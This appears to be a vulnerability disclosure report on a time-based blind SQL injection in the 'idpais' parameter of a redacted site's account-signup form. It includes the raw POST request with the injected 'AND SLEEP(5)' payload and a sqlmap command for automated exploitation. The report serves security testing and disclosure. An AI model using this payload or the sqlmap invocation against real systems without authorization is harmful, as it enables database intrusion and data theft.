Time Based Blind SQL Injection
URL:
https://tools.redacted.com/en/mybox/new-account/
Description:
The resource doesn’t properly sanitize the “idpais” variable before putting it into a MySQL statement. This results in a Blind SQL Injection vulnerability. We can demonstrate the vulnerability by making the MYSQL server sleep for a while before responding.
Steps to Reproduce:
1) Goto this URL:
https://tools.redacted.com/en/mybox/new-account/
2) Now create an account and notice the “POST” Request and now Request becomes.
3) Vulnerable parameter “idpais” passed in POST , then we insert some Blind SQL commands.
4) Now we Found Time Based Blind SQL.
Request:
POST /en/mybox/finish-new-account/ HTTP/1.1
Host: tools.redacted.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
langdir=en%2F&mr_mrs=Mr&nombre=dfd&apellidos=fdfsdfd&email=test%40abc.com&idpais=75 AND SLEEP(5)&countryCallingCode=%2B+1&telefono=219923171&nacimiento=1990-05-04&direccion=ffddf+&ciudad=dfdffdf&cp=10005&password=Passwd1&renewPassword=PAsswd1&empr_omitir=on&acept-1=on&accept_marketing=on&accept_profile=on
~The result should come out in around 5 seconds, thereby executing the sleep command.
Manual POC:
SQLMAP POC:
SQLMAP Command: (POST Request)
sqlmap -r request.txt -p idpais